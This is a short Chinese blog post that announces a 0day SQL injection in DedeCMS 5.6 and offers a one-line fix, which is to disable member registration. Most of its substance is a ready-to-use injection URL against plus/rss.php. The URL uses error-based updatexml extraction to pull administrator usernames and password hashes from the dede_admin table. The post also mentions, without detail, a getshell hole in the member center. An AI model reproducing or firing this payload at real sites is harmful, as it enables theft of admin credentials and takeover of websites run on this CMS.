dedecms 5.6的入0day漏洞及解决方案

注入代码:

uploads/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2%29%29%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1

修复:

关闭会员注册,会员中心存在getshell漏洞

转载请注明出处:http://www.donr.com.cn/143.html


扫一扫,分享到微信

猜你喜欢

文章评论

电子邮件地址不会被公开。 必填项已用*标注

后发表评论

上一篇

HTTPS劫持研究

下一篇

逐浪CMS某处编码SQL注入漏洞